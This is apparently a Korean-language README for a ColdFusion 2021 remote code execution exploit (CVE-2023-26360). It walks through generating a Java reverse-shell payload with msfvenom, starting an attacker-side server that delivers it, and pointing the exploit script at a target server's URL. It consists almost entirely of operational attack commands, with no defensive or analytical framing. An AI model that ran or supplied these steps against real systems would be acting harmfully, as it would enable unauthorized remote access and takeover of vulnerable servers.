
ColdFusion 2021(CVE-2023-26360) 원격 코드 실행 익스플로잇
때때로 스크립트가 첫 시도에 작동하지 않습니다. 작동할 때까지 몇 번 시도해 보세요
msfvenom -p java/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 > file.java
server.py 시작하기cve.2023-26360.py를 통한 초기 접근 후 Coldfusion 서버로 페이로드를 전송하므로, 먼저 초기화되어 있어야 합니다.python3 server.py 8000
8000 인자는 서버가 수신 대기할 포트입니다.
12번째 줄에서 서버 IP 주소를 구성하므로 이를 변경해야 한다는 점에 유의하세요:
s.bind(('192.168.56.1',port))
cve-2023-26360.py 실행python3 cve-2023-26360.py 8000
server.py와 마찬가지로 8000 인자는 server.py가 수신 대기할 포트입니다. 따라서 두 명령 모두에서 동일해야 합니다.
cve-2023-26360.py의 8번째 줄은 server.py가 수신 대기할 IP 주소를 설정합니다. 이를 올바르게 구성해야 합니다.
cve-2023-26360.py의 11번째 줄은 Coldfusion 서버의 IP 주소를 설정하므로 변경하세요:
url = "http://192.168.56.102:8500"